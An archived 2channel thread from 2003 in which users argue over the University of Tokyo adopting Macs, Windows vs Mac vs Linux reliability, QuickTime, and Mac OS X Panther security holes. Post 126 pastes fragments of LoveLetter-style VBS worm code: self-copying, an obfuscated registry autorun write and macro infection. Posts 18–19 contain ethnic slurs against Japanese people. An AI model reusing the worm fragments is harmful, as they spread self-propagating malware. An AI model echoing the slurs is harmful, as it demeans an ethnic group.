2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

東京大学に Mac 大量導入

1 :Be名無しさん:03/10/03 21:18
結局、Win派はMSに騙され続けたんだよ。シェアという魔術でね。
Linux派も同じ。オープンソースという偽りの言葉で。

だから東大は偽りのないUNIXとMacOSを選んだのさ

2 :Be名無しさん:03/10/03 21:22
つーかさ、いつになったらAthlon64は一般ユーザに普及するんだい?
大手メーカも採用に踏み切らないところが多いようだし。

G5は発売以降、確実にユーザの手元に届きつつあるよ。

3 :Be名無しさん:03/10/03 21:23
結局、選択の理由はUNIX+MacOS環境の堅牢&柔軟さだからね。
欠陥OSのWindowsなんて最初から選択肢にないわけよ。

4 :Be名無しさん:03/10/03 21:25
またマカマカしいスレか

5 :Be名無しさん:03/10/03 21:30
そういえば、Macにはゲイツをやっつけたりするゲームなんか
結構あるでしょ。Winにもあるけど。Linuxだとゲイツというより
Winそのものを叩くゲームがあったり。
けど、Winには、例えばジョブズやLinusをやっつけたり、
MacやLinuxを叩くゲームって見たことがない。
なんでだろ。

6 :Be名無しさん:03/10/03 21:35
ちょっといいですか?
>>1-3って全部俺の他スレのコメントなんだけど。
なんでスレタイにまで・・ハァ

7 :Be名無しさん:03/10/03 21:49
その道の専門家がMacを選んだのは、それなりの理由があったとは思うが、まさかMacOSXだとは、、、

8 :Be名無しさん:03/10/03 21:53
迷える専門家たちを救う一筋の光・・それがMacOSなのです。

9 :Be名無しさん:03/10/03 21:55
きっと4のような人が、アラシ系の人かも、そんな匂い!!!!



10 :Be名無しさん:03/10/03 21:57
8は酔い過ぎ!!!

11 :Be名無しさん:03/10/03 22:02
国の予算使って使い捨てのWINパソコンを導入することは許されない

12 :Be名無しさん:03/10/03 22:03
煽っとるんですか?

13 :Be名無しさん:03/10/03 22:30
さすがOS板は他と流れが違うね。
PC板では暴発状態だというのに。

14 :Be名無しさん:03/10/03 22:42
過疎地だからな

15 :Be名無しさん:03/10/03 22:48
あ〜4の人だ!!!!

16 :Be名無しさん:03/10/03 23:09
たとえWindowsの牙城が崩されても

MacではPC/AT互換機の牙城は崩すことができない

17 :Be名無しさん:03/10/03 23:12
だから東大は頑張ったって言ってるでしょ?

18 :Be名無しさん:03/10/03 23:18
>>17
チョッパリごときの大学が導入したからといって
全世界でPC/AT互換機市場が崩れ去ることは考えにくい。

19 :Be名無しさん:03/10/03 23:21
黄色い人種の中で最も卑しく劣った民族の最高学府が頑張ったとしても
世界的には・・・

20 :Be名無しさん:03/10/03 23:22
東大の先生は、なんか勘違いしたんだね!!!
なしてマックやねん!!

21 :Be名無しさん:03/10/03 23:50
実は一番安かったのです。(事実、原価は驚くほど安い部品構成です)
世界一バカなマッカーはウソのような値段で買っています。

22 :Be名無しさん:03/10/04 00:06
iMacの作り込みの良さや、作った人間のこだわり、
工業製品としての完成度の高さは、他社の見本になってると思いますが、
21さんには、そういう感覚や感性がないのかも!!!

23 :Be名無しさん:03/10/04 00:08
>>19
その卑しく劣った民族の国である日本が世界経済の15%を担い
最新の電子精密機器の90%を製造しアメリカ軍の最新兵器で
さえ日本の技術無しでは成り立たない状況をど見る?

24 :Be名無しさん:03/10/04 00:16
どうでもいいんでないかい?

25 :Be名無しさん:03/10/04 00:52
>>22
作った人間のこだわりは認めるが、
作りこみの良さと工業製品としての完成度は
認められたものじゃないと思うが。

とかいうとドザとか言われるんだろうな。

26 :Be名無しさん:03/10/04 01:11
>>23
たとえそうだとしても、だからといって東京大学が
Mac導入したからMacが大幅に普及することはありえないだろ。
(せいぜい勘違いした教育機関が学内に購入することはあるだろうが)

ちなみに日本の工業は一握りのエリート(設計開発部門のブレインや
役員管理職たち)の下で多くの低学歴がもの作りしてることを忘れるな。

27 :Be名無しさん:03/10/04 01:24
群衆を動かすにはボトムアップではだめだ。
トップダウンじゃないと。
だから正解。


28 :Be名無しさん:03/10/04 01:29
>>27
最近はトップが命令下してもボトムが動かないケースが多いな。

29 :Be名無しさん:03/10/04 01:44
結局、教育機関はLinuxより*BSDが好きってことでしょ。

30 :23:03/10/04 01:57
>>26
>黄色い人種の中で最も卑しく劣った民族
って発言に対してのものなので。
MACは普及する必要はないと思ってるよ。
ユーザーが幸せでAppleが黒字ならそれでいいじゃないかな。
誰かに迷惑をかけるわけでもないし。

FreeBSDを使っているのでMACにも手を出してみよう
かなと考える今日この頃。
Darwinにも興味がある。

31 :Be名無しさん:03/10/04 07:53
iMacの物としての完成度は、高いと思うよ!
Macintoshだから作れたと思う!
安かろう早かろう!を目指してるWin開発社では、
企画の初期段階で完全に没だね!
うちの企画室でも、デザイン画が、あがってきた段階で、開発コスト云々で
袋叩きになってるな!
工業製品としてはiMacの存在自体が、特殊で、しかも利益を上げてると言うのだから
正直すごいと思うよ!
S社のWと造りのディテールを2台並べて比べてみてもその差は歴然としたものが有る。
S社のZとPowerBookを2台比べて見ても造りの良さと質感の高さは、圧倒的と言えるほど
Macintoshに軍配が上がる!
その他のパソとも比較研究してるけど、我が社の製品は、3流としか言えないかな!
ねじ一本の露出に使い勝手の良さを追求してる開発者がどの程度いるのか
iPod等は、圧巻としか言い様がない。
あれを作ろうとしても、社の体質がそれを許さない!!!!なさけな!!
日本の企業は、どこも同じ体質だと思うよ!


32 :Be名無しさん:03/10/04 12:35
appleは1kg以下のnoteも作ってください。そしたら買うよ。

33 :Be名無しさん:03/10/04 15:15
>>30
Appleによい話題が出てくるとバカマカーが迷惑かけまくるんですが(プ

34 :Be名無しさん:03/10/04 17:49
Macだと開発環境が整わないんですけど
あ、マカーは開発なんかしないか(プ

35 :Be名無しさん:03/10/04 18:46
>>34
だから?

36 :1:03/10/04 19:35
いやー程よくなってきましたね

37 :Be名無しさん:03/10/04 20:16
>>35
つかえない

38 :Be名無しさん:03/10/04 20:37
>>31さんのような方(バカ)がいらっしゃる限り、Appleは安泰です。
「Macには何か特別な力が備わっており、Mac無しでは人生がつまらない」
それがマッカーです。在りもしない幻想を作り出してすがる。
だから滑稽で常に嘲笑の的となるのです。

39 :Be名無しさん:03/10/04 21:11
マカーではないが、マカーを滑稽だと思った事はない。
また、Macを賛美する人間をバカと思った事もない。
38さんは、他人を非難する事で自分の存在価値を感じたいだけだと思う。
30さんのように、ユーザーが幸せでAppleが黒字ならそれでいいじゃないかな。
というぐらいの感覚がノーマルだ。
38さんは、自分で自身を受け入れられずにいる部分が大きくあり過ぎる。
未だ自立していない!
他人を非難するよりもっと頑張らなければならないことがある。



40 :Be名無しさん:03/10/04 21:18
必要以上に他を気にして、自分はおしゃれで優れているものを使っている
という意識を刷り込まれてるのがマカだろう。

41 :Be名無しさん:03/10/04 21:22
40さん!!それがどうしたの39の人が言ってる
そのまんまの人ですね!!!

42 :Be名無しさん:03/10/05 00:50
結論
ドザはバカばっかり

43 :Be名無しさん:03/10/05 06:40
本当の結論はだな。
バカじゃなけりゃコンピュータなんぞでは遊べん。

44 :Be名無しさん:03/10/05 09:31
歪んだ目で見た世界を根拠にした幻想を針小棒大に語るマカーは
しばしば情報操作を行う日本のマスコミに似ている。
だから、今、僕達にはメディアリテラシーが求められている!

45 :Be名無しさん:03/10/05 10:06
バカばっかりだから、簡単に囲い込まれてボロい商売で甘い汁を吸うための標的に
されてしまうわけだ。Windowsが最高と思ってるとすれば、売り手に有利な思い込みを
刷り込まれたと思いなさい。目的達成のための手段として一つだけの方法に強く依存している
状態は忌むべき状態だと考え、リスクの分散をなさい。

46 :Be名無しさん:03/10/05 14:05
>>45
なるほど。「マック最高に使いやすい→マッカー=バカ」という事にもなりますな。
そしてマッカーはとりたてオシャレな人たちや洗練された女性ではなく、無精ヒゲを
生やしたタバコ臭いオッサンというのが現実です。
鏡を見なさいクソマッカーしょくん。

47 :Be名無しさん:03/10/05 17:22
Winは最強 → ドザ = バカ も当てはまるな。
マカーもドザもバカに変わりは無い。

48 :Be名無しさん:03/10/05 17:52
MSアンチは基地外
Linux信者はまとも

49 :Be名無しさん:03/10/05 18:12
>>48
Linux信者は基地外。

50 :Be名無しさん:03/10/05 18:12
「MSアンチ」で板を検索すると…

51 :Be名無しさん:03/10/05 18:46
最近、ハッカーやクラッカーのコミュニティでレベルの低下が嘆かれている。
以前は脆弱性が発見されても攻撃ツールを作成するには相応のスキルが必要であった。

しかし、最近のMSの脆弱性は未テストのためか、その構造があまりにも簡単すぎるため、
素人並みの知識でも攻撃ツールが作成できるようになってしまった。

この点においては、MSの開発体制のずさんさが如実に現れていると言えよう。

結果として、昨今のウイルス騒動はMS自身が引き起こした問題だと言える。


52 :Be名無しさん:03/10/05 21:22
MSにはセキュリティ検証部門ってないのか?
あったとしても開発にフィードバックされてるのか?

53 :Be名無しさん:03/10/05 22:41
されてたら、こんなに穴だらけのソフトなんて出来ないよ

54 :Be名無しさん:03/10/05 22:44
へたれスクリプタごときがハッカーづらをする時代になったか。堪らんな。しょうがねえバカ共だ。
それじゃあ、東大やマカは支持するのが社会のためだな。

55 :Be名無しさん:03/10/07 00:22
俺の先入観
MS反対派→超国粋的な馬鹿な政治家(じゃあ自分で1からPC作れよ),それ以外のOSがとっても優れていると感じている神
Linux反対派→サーバー向け,互換性がない,その他諸々を考えすぎている学者(実はMS擁護派)
TRON反対派→互換性が無いと考えている教授(合ってるけどさ…)
Mac反対派→一般学生,一般市民(偉い人は目も向けないくらいクソマシン)
決めた人→明日からパソコン始める事務のおばちゃん
よって偉い方がMacを反対しないからMac導入

56 :Be名無しさん:03/10/07 01:38
ただ単に、日本国内でまともなアフターケアの受けられる
ローエンド一体型のUnix系パソコン選んだだけっしょ。

っと書いていて思い出したのだが
たしか、「入札」じゃなかったか?これって
NEC系の導入業者が落としたって

つまり、一番安かったってことか。

57 :Be名無しさん:03/10/07 08:55
東京女子大でもMac導入。
http://www.twcu.ac.jp/cis/index.html

時期的に東大に追随したってわけではなさそう。
まあ普通の頭ならWinがいかにやばいかってのが解るってもんだ。
(東大はNCからの切り替えだけどね)

58 :Be名無しさん:03/10/07 21:48
MacはUNIXって騒いでるけど所詮UNIXには劣ってるんだよね。
だいいちWinインスコできるPCはなんでもござれな感じだけどMacは敷居高すぎ互換性皆無の(言いすぎだけど)独自路線突っ走ってるから
いろんな事考えるとやっぱ無難なとこでDOS/Vにしといた方が良かったかと思う…

59 :Be名無しさん:03/10/07 21:58
>>58

>MacはUNIXって騒いでるけど所詮UNIXには劣ってるんだよね。

どこがどう劣ってるのか解説キボン。
ってか両方とも触ったことのない君にはムリだと思うけどね。

60 :Be名無しさん:03/10/07 22:01
>敷居高すぎ互換性皆無の(言いすぎだけど)独自路線突っ走ってるから

それってM$のことでは?
java然り、HTML然り、MPEG-4までちゃっかり独自仕様にしてんぞ。

61 :Be名無しさん:03/10/07 22:03
クライアントとしてはまあまあだけ思うけど、

Max OS X serverをwebサーバとして導入しているとこ知ってますが、
solarisとlinuxと比べると頻繁に障害が発生してたよ、
結構、ディレクトリとかユーザ名とかの癖もつよいし、
サーバとしては、俺的にはno thank you

62 :Be名無しさん:03/10/07 22:22
>>61
それは管理側がヘボいだけでは?
しっかりとした管理者がいるところはWindowsだろうが
LinuxだろうがMACだろうが問題なく運用してると思われ。

63 :Be名無しさん:03/10/07 22:22
>結構、ディレクトリとかユーザ名とかの癖もつよいし、

よく知らないことがばれちゃいますね。

64 :Be名無しさん:03/10/07 22:29
>>63
誰も使ってねーよ、そんなもの

65 :Be名無しさん:03/10/07 22:30
まあ、事実だな。
インストール先もなんだかんだ言ってマチマチだし。

66 :Be名無しさん:03/10/07 22:37
>>60
Macはハードから違いますが何か?

67 :Be名無しさん:03/10/07 22:39
>>66
わけわからんぞ。
仕様って意味わかる?

68 :Be名無しさん:03/10/07 22:44
大量導入するのに、Winでしか動かないソフトがいらなかったから、メンテ性を考えてMacにしたということでしょ。
こういう選択肢もあるということであって、それ以上でも以下でもない。
個人的には面倒くさくないのがいいからMacでもいい。しかし、いまのところWinパソコンのほうが、周辺機器とか何とかの面で融通が利くし、探せば安いものがいくらでもあるから、Win使ってるってだけのこと。
大騒ぎするようなことではない。たかがOS。

69 :Be名無しさん:03/10/07 23:00
>>62
運用実績がほかのOSと比べると少ないから、
ノウハウがないということでよろしいでしょうか。
サーバして運用するなら、そのへんの事例がもっと欲しいのですが

サーバの負荷が高くなると、
ほかのOSとは違って挙動不審になるんですよね。
ヒットすうは、1日に億ぐらいかな。
もちろん複数台で運用してるけど。





70 :Be名無しさん:03/10/07 23:29
>>69
>サーバの負荷が高くなると、
>ほかのOSとは違って挙動不審になるんですよね。
それをなんとかするのが管理者の腕の見せ所だと思われ。
管理者が馬鹿ならLinux鯖でも不安定になるし落ちる時もある。

71 :Be名無しさん:03/10/07 23:34
>>68
一番普及していて比較的安く購入できるWindowsよりも
普及してなくて値段が高いMACが採用されたことは大きな問題。
メンテの話だけでは理由として不十分でしょ。
裏に何かありそうだ。

72 :Be名無しさん:03/10/07 23:43
他のUNIXと違うところって、
OSXのApacheで、cgi関連のディレクトリが一部違うぐらいで、
シンボリックリンクを1つ作れば回避できるぐらいぢゃない?
他にあったかな?


73 :Be名無しさん:03/10/07 23:48
みなさん、今度は東京女子大学もMacに乗り換えですよ!


74 :Be名無しさん:03/10/08 00:10
>>69
>運用実績がほかのOSと比べると少ないから、
>ノウハウがないということでよろしいでしょうか。
中身はBSDですが何か?

75 :Be名無しさん:03/10/08 00:52
>>74
私はMacOSXの運用実績でいってるのですけど、
BSD系すべてのOSをさしているのではないのですが、






76 :Be名無しさん:03/10/08 01:07
>>75
だからノウハウはBSDのものであかんのかって事。

77 :Be名無しさん:03/10/08 07:46
>>76
Darwinの実績がないからだめだろうな。

78 :Be名無しさん:03/10/08 09:48
>>76
あかん

79 :Be名無しさん:03/10/08 10:44
中核は歴史のあるBSDなのだから今までのノウハウは十分に
生かせると思うが。
Darwinのどこがダメなのか説明キボン。

80 :Be名無しさん:03/10/08 12:34
致命的な欠陥
・DarwinはApple製
・動作するハードウエアがApple製

81 :Be名無しさん:03/10/08 13:53
>>80
それは欠陥とは言わん。とマジレス。

82 :Be名無しさん:03/10/08 14:17
>>80
アンチAppleが理由ですかw

83 :Be名無しさん:03/10/08 14:26
BSDというかNeXTやん

84 :Be名無しさん:03/10/08 15:08
>>82
アポーはハードウエアの品質が悪い(発煙焼損なんてあのSotecですら聞いたことが無い)
OSのマイナーアップデート如きで互換性の問題が噴出(Windowsだってそこまで酷くない)
現行機種ですら次期OSでサポートされるか不安がある(Rage128搭載機はQE未対応とか)

知らなければ導入を検討されない、知っていれば避けられる。それがアポーというブランド。

85 :Be名無しさん:03/10/08 15:20
FUD

86 :Be名無しさん:03/10/08 15:32
東京大学に マカー 大量発生

87 :Be名無しさん:03/10/08 16:38
>>84
どこかの大手メーカーが販売したパソコンが煙を吐くってんで
無償修理を実施したことがありますがなにか?
どこのメーカーとは言いませんが。

88 :Be名無しさん:03/10/08 17:16
>>84>>87
まーまー、不毛な言い争いはやめませう。

89 :Be名無しさん:03/10/08 17:27
誰がハゲだって?このハゲが!

90 :Be名無しさん:03/10/08 17:35
>>84
>OSのマイナーアップデート如きで互換性の問題が噴出(Windowsだってそこまで酷くない)
いやWinもあるって、、、WinMeとか

91 :Be名無しさん:03/10/08 19:04
>>84
Windowsにもありまくりですが。

92 :Be名無しさん:03/10/08 20:55
ええ〜?Macのが多いでしょ?

93 :Be名無しさん:03/10/08 21:46
いいえ、どっちもどっちです。

94 :Be名無しさん:03/10/08 22:05
↓ここでLinux

95 :Be名無しさん:03/10/08 22:06
特に9xとNTの間の互換性の無さは致命的だしね。
2000やXPである程度解決されたと言っても動かないものは動かないし。
動には動くが使っているとエラーを出すやつも多い。
Macも同じでしょう。
OS9以前とOSXの関係は9xとNTの関係に似ている。
まあOSXのバージョンによって動いたり動かなかったりするアプリ
があるのはどうにかしてほしいが。

96 :Be名無しさん:03/10/09 02:29
アプリのOS対応の問題は、二つの側面で見るべき。
ひとつは、古い開発の止まったソフトの利用。
もうひとつは、最新OSで現用ソフトが稼動するか?

後者の問題は、最新OSにそれぞれのアプリが対応すればすむこと。
多少の遅れはあるけど、そこでOSの更新の時期を調整すれば済む。

しかし、前者の問題の場合は、userとしてできることは
そのソフトが動くOSを動かすしか方法が無くなる。これが問題。
たとえば森山塔は今もSuperPaintなのか?という問題(それ余談)

Windows95用ソフトを6,7年さんざん出させて
WindowsXPでは使えません。Dual bootしたい人はすれば?
というWindowsXPのつきはなしぶりに比べれば
MacOS XはClassicがあるだけかなりましだと思う。

WindowsXPから95に起動しなおす時間。OS自体脆弱な95系。
それに対して、MacOS X上のClassicとしてのMacOS9は
たとえそれが落ちても、MacOS Xはずっと動き続けていられる。

WindowsXPでWindows95用ソフトが動かなかったとしても
そこでdual bootやVirtualPC導入などを試みるWindows userは
(割合的には)決して多くないだろう。

しかし、昔からのMacOS userのうちMacOS Xを導入した人は
かなり高い確率でClassic(MacOS 9)を利用しているだろうし
開発の止まった古い愛用のソフトを動かせている率も高いだろう。

それが、どれだけすばらしいことなのかは…
OS/2 userがいちばんよくわかっている (;_;)
そして95系に付き合わされた民衆が哀れとも思う。


97 :アホージャパン:03/10/09 03:30
ファッキンテッシュウにはこういうの出来ないよな

クラリオン、05年めどにカーナビOSを国産OSからウィンドウズに一本化【他社も採用に踏み切る?】
http://news5.2ch.net/test/read.cgi/newsplus/1065585508/


98 :Be名無しさん:03/10/09 07:14
Windowsだ、Macだと盛り上がっているようですが、
この度、捨てられることとなったLinuxも仲間に入れて上げてください。

99 :Be名無しさん:03/10/09 07:29
>>1よ、NetBootシステムと、東大は教授達が使い馴れたMacを導入するだけだ。
NetBoot導入が遅いと思うんだ、五流私立のうちの大学だって、かなり前から導入してますしね。
つまり、東大は時代遅れです。

100 :Be名無しさん:03/10/09 08:21
>>97
もうカーナビぐらいしかダメって事ですね。

>>99
バカ? 

101 :Be名無しさん:03/10/09 08:22
ちっ、100getだった…

102 :Be名無しさん:03/10/09 13:27
>>96
無茶苦茶でつね。
Win95アプリの大多数はそのままWinXPでも動きますヨ!?

103 :Be名無しさん:03/10/09 13:53
ここはOSの表面的な話しか出来ない人が多いみたいなので結論は出ないでしょう。
OSの歴史も間違って認識している人も居る見たいだし・・・
今後も頑張って下さい。

104 :Be名無しさん:03/10/09 14:30
マカーはShellしか見てないしナw

105 :Be名無しさん:03/10/09 15:59
>>102
俺のことろの95アプリは半数以上が使い物にならない状態だが。
動くがエラーが出るやつが多い。
互換モードも絶対ってわけではないんでどうにも。

106 :Be名無しさん:03/10/09 16:03
>>105
どんなアプリが動かない?

107 :Be名無しさん:03/10/09 16:22
>>106
テキスト系のを使っているとエラーを伝えるダイアログが現れて
強制終了させられるってのが多い。
他にもゲームで動かないものがある。
98に対応しているアプリは正常に動いていてます。
動かないアプリはMS純正の開発環境を使ってないとか?

108 :Be名無しさん:03/10/09 16:27
Win3.1-Win95移行期によくあった、行儀の悪いアプリは駄目かもナ。

109 :Be名無しさん:03/10/10 14:02
>>107
おめーそれはWin16のソフトだろ。
WinXPはWin95をベースにしたWin32API持ってるんだから動くのが普通。

110 :Be名無しさん:03/10/10 14:04
俺はWindowsも使うマックファンなんだけど
マックユーザが>>96みたいな馬鹿ばっかりだと思われては困る。

> Windows95用ソフトを6,7年さんざん出させて

はぁ?

111 :Be名無しさん:03/10/10 17:05
>>109
95のWin32APIはNTのサブセットなんだが。
問題は95にはWin16の依存したAPIが存在すること。
NT/2000で動かないアプリがあったのはそのため。
MSDNを見たらわかると思うけど9xでは16bit処理でも
NTでは32bit処理って命令が少なからずある。

私の環境では98で使っていたデスクトップアクセサリ
がXPで使えなかったよ。
かなり気に入ってたものなので(´・ω・`)です・・・

112 :Be名無しさん:03/10/10 17:27
>俺はWindowsも使うマックファンなんだけど
( ´,_ゝ`)プッ

113 :Be名無しさん:03/10/10 20:59
ってかMacもWinも用途によるだろ

114 :Be名無しさん:03/10/10 22:17
64BitWindowsではやっと16Bitを完全に切り捨てたな

115 :Be名無しさん:03/10/13 05:36
次期Windowsの互換モードはVirtualPCなんだろうなと思う今日この頃。

116 :Be名無しさん:03/10/13 05:48
http://satellite.esenden.com/ranking/ranklink.cgi?id=groovy

117 :Be名無しさん:03/10/17 20:24
頭狂大学出身者で、PCの世界で有名な人って居るんですか?
石田晴久以外で

118 :Be名無しさん:03/10/21 18:32
Macのマルチメディア環境はQTがあることが前提になってるけど、
Winにまでその制限を持ち込むなよな。
だから、ゲイシに手を引けって言われるんだよ。


119 :Be名無しさん:03/10/22 00:42
QTは、かなりの優れものだと思うんですが!!
けして制限ではなくコンテンツづくりの最良のパートナーになると思います。
わしらの家業では不可欠な存在です。

120 :Be名無しさん:03/10/22 12:03
>>119
> QTは、かなりの優れものだと思うんですが!!
例えばどういう点で?

121 :Be名無しさん:03/10/22 13:09
>>120
アポーのプロダクトだから
  90%
MSのプロダクトじゃないから
  9%
その他
  1%

こんな感じじゃない?w

122 :Be名無しさん:03/10/24 00:10
win用の簡単なコンテンツはQTで作ってるぞ!



123 :Be名無しさん:03/10/24 00:13
WMPでは、環境が貧弱すぎる。
子供騙し見たいんだったら出来るけどね!!

124 :Be名無しさん:03/10/24 01:59
QTはとにかくシツコク「金払ってアップグレード汁!」と要求し続けるのがウザイ

125 :Be名無しさん:03/10/24 02:31
>>123
元々MMC APIに変わるCOMの一つに過ぎなかったWMPに万能を求める時点でどうかと。

126 :Be名無しさん:03/10/24 13:14
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

127 :Be名無しさん:03/10/24 14:00
創り手側はどうかしらんが、観る側としてはQTの方が画が汚い。

128 :Be名無しさん:03/10/24 18:05
キャプチャ厨がきたみたいです。
いやDLしてるだけっぽいな

codecとかビットレートとかちがえば画質なんてかわるだろQTとかaviあんまり関係ない
どんな風に圧縮されたQTみてるかしらんけどさ
MPEG4系の高圧縮されたものしか世の中に存在してないとおもってるのか?

129 :Be名無しさん:03/10/24 18:15
世の中にはアポー以外の優れた技術がたくさんあるって事実に目を向けような

130 :Be名無しさん:03/10/24 18:21
QTってファイルでかいのに画質ワルイな。
せっかくオープンソースに寄生したんだからXviDに追いつけ。

131 :Be名無しさん:03/10/24 18:29
えー、マジQT?
QTが許されるのは(ry

132 :Be名無しさん:03/10/24 18:51
本当にキャプ厨ばっかだな

133 :Be名無しさん:03/10/24 19:09
キャプ厨という事にしないと反論できない人ばっかりですね

134 :Be名無しさん:03/10/24 23:41
QTに高画質にセッティングできるポジションがあるの知ってるかい!

135 :Be名無しさん:03/10/24 23:52
東京大学はQuickTimeを選びました。
ルーカスフィルムもQuickTimeを選びました。
Matrix.comもQuickTimeを選びました。

136 :Be名無しさん:03/10/26 02:44
ってか映像業界ではQTが標準でつ。
wmv形式でデータなんぞ持ってったら、張り倒されまつ。
それにwinMediaplayerもrealも元の技術はQTでしょ。


137 :Be名無しさん:03/10/26 14:58
やっぱり、Macしかないんだね。

138 :脱マカセラピー:03/10/26 16:30
Macが無くなっても誰も困りません。人生はきっとそのまま進行して
いく事でしょう。
物事の価値観は人それぞれですが、これはそういう問題ではありません。
「素晴らしい真実」なのです。

「MacにはWindows PCには無い何か特別な力が備わっており、Mac無し
の人生はつまらなく、愉しめない」
この間違った観念が問題なのです。
洗脳された頭で何を考えても無駄です。故にマックユーザーはしつこく、
周囲との摩擦やトラブルを起こすのです。


139 :Be名無しさん:03/10/26 16:33
●2003年 日経ビジネス3/10 特集『この会社から買いたい』
調査期間
2003/1/10-2/5

●「無故障率」ランキング
1位ソニー 78.9%
2位エプソンダイレクト 78.4%
3位デルコンピュータ 78.3%



13位ソーテック 61.1% ←---------- 最下位

●満足度指数(偏差値)
1位デルコンピュータ 58.9% (74.5)
2位エプソンダイレクト 40.3% (59.6)
3位東芝 37.2% (57.2)



13位ソーテック 1.1% (28.3) ←---------- 最下位(11%ではないです[1.1]%)


140 :Be名無しさん:03/10/27 13:11
アップルは価値がないのでシカトですか

141 :&rlo;んーぼあ&lro;あぼーん:03/10/27 15:08
あぼーん

142 :Be名無しさん:03/10/30 15:55
http://www.zdnet.co.jp/enterprise/0310/30/epn05.html
http://www.zdnet.co.jp/enterprise/0310/30/epn11.html
Mac OS Xセキュリティーホールを塞ぐにはPantherっていう
有料のパッチを当てるしかないんですね。
随分お高いパッチですこと。

143 :Be名無しさん:03/10/30 23:08
MS,次のパッチはLonghornです。


144 :Be名無しさん:03/10/30 23:14
セキュリティパッチ提供

Windows 5年間無償
Red Hat Linux 1年間無償、2年目以降は年60ドル必要








Mac OS X 無償保障期間なし、毎年129ドル必要
http://www.zdnet.co.jp/enterprise/0310/30/epn11.html


145 :Be名無しさん:03/10/30 23:27
Winは導入時にそれなりに金払ってるじゃん?
コンシューマ向けプリインストマシンしか使ったことない奴はWin単体の値段も知らん
だろうけど。
Linuxは赤帽が全部面倒見てるわけじゃないから。
それらと比べて年$129が高いと思うなら使わなければよろし。
関係ないけどPantherは$129価値あるよ。
開発ツールはタダで提供されてるし。

146 :Be名無しさん:03/10/30 23:28
(・∀・)ニヤニヤ

147 :Be名無しさん:03/10/30 23:33
>>146
まあ、がんばれ。

148 :Be名無しさん:03/10/31 15:02
>140
マックの国内全売り上げ台数は、フロンティア神代と良い勝負では無かろうか
一販売店程度しか売れないのは、統計対象外

149 :Be名無しさん:03/10/31 16:01
Mac OS Xに大量の脆弱性、解決策は新バージョンのOSへの移行のみ
http://www.zdnet.co.jp/enterprise/0310/30/epn05.html
http://www.zdnet.co.jp/enterprise/0310/30/epn11.html
http://headlines.yahoo.co.jp/hl?a=20031030-00000005-vgb-sci
http://japan.cnet.com/news/tech/story/0,2000047674,20061692,00.htm
http://internet.watch.impress.co.jp/www/article/2003/0411/macos.htm

"Panther"に深刻な障害--一部の外付けHDでデータ消失の危険性
http://headlines.yahoo.co.jp/hl?a=20031031-00000004-cnet-sci
http://www.zdnet.co.jp/news/0310/31/nebt_15.html
ttp://japan.cnet.com/news/tech/story/0,2000047674,20061724,00.htm
ttp://www.lacie.co.jp/product/hdd.html

150 :ニュース速報+:03/10/31 18:02
http://news5.2ch.net/test/read.cgi/newsplus/1067587865/l50

【IT】Mac OS X最新版Pantherに外付けHDDデータ損失の不具合

1 :ちぃφ ★ :03/10/31 17:11 ID:???
Mac OS X最新版「Panther」をインストールしたユーザーの一部から、
外付けHDDに保存したデータが失われたという不具合が報告されている。

米Apple Computerはこの不具合について、Oxford Semiconductor製の特定チップセットを使った
FireWire接続外付けHDDにのみ起きると説明している。
Appleは同チップセット搭載のHDDを使っているユーザーに向けて、
Pantherへアップグレードする際には、Macから外付けHDDを取り外すよう促している。

「Oxford 922ブリッジチップセットとファームウェアのバージョン1.02を採用した
外付けFireWireハードドライブに問題があることが分かった。
Appleは問題解決に向けて、Oxford、および影響を受けるHDDメーカーと作業を進めている」と同社。

Oxford Semiconductorの関係者はコメントを拒否している。

影響を受けるHDDには、LaCieが販売するFirewire 800対応HDD「d2」シリーズが含まれる。
LaCieはシリアルナンバーが「1339xxxxx」か「0339xxxxx」より小さい製品が影響を受けると話している。
これらのHDDは2003年4月から9月30日にかけて出荷された。

記事の引用元:http://www.zdnet.co.jp/news/0310/31/nebt_15.html

依頼有り:http://news5.2ch.net/test/read.cgi/newsplus/1067405730/240

151 :Be名無しさん:03/10/31 19:05
怖っ

152 :Be名無しさん:03/10/31 19:25
調べるのめんどくさいから、しばらく外付け繋ぐ気になれんな。。。。
iPodは大丈夫なんだろーな?

153 :Be名無しさん:03/10/31 21:23
Mac OS X
・20近い脆弱性を,都度ユーザに周知していなかった
・周知しないので,セキュリティパッチの迅速な提供もなされていない
・脆弱性へ対応するには有料のアップグレード(Panther)しか選択肢が無い
・アップグレードすると,HDDのデータが消失する可能性がある

Windows
・脆弱性については,都度ユーザに周知
・セキュリティパッチも,緊急レベルであれば迅速に提供されている
・NT4 Workstationなどは無料サポート期間が過ぎていたが,Blasterについてはパッチが提供された

その差歴然。

154 :Be名無しさん:03/10/31 21:31
頭わるそうな子供だ

155 :Be名無しさん:03/10/31 23:32
>>153
Windowsの場合はMSがバグを公表する前に他の奴が漏らすわな。
だから必然的に皆が知るだけのこと。
てかバグ多すぎ。

156 :Be名無しさん:03/11/01 00:04
そもそもマカーにバグを見つける能力があるヤツ居るのかが疑問だが。
その手の技術者を引き込みたくてFreeBSDに寄生したんだろうけど。

157 :Be名無しさん:03/11/01 11:56

まぁ、なんだかんだいっても、使いやすいよ。MacOS X 。

158 :Be名無しさん:03/11/01 16:16
マックはウィルスが入っても入らなくても、同じようにハングアップするのじゃろうから
ウィルス入ったお陰で安定したとかありかも
やつ(激マッカー)のマックは、LHA解凍しただけでハングアップしたのを目撃!

159 :Be名無しさん:03/11/02 03:35
アイコンパレード開始と同時に爆弾、エラーメッセージは化けて読めない。

これがMacOSの醍醐味なのに、OS Xじゃ見れないの?だめじゃ〜ん。

160 :Be名無しさん:03/11/02 13:05
>>156
Windowsでもなんでもほとんど専門機関が脆弱性を発見するからね。
ユーザはだまってゲームするがよろし。


161 :Be名無しさん:03/12/24 00:57
あの「週間 セキュリュティホール」状態はなんとかしてほしい

162 :Be名無しさん:03/12/24 07:07
>>1
本当に偽りも汚れもないのはOS9以前のMacだけ。
Unixに寄生してMacの看板を掲げているOSXに何の疑問も持たないのか?

163 :Be名無しさん:03/12/24 08:02
亀レスだが
>>153
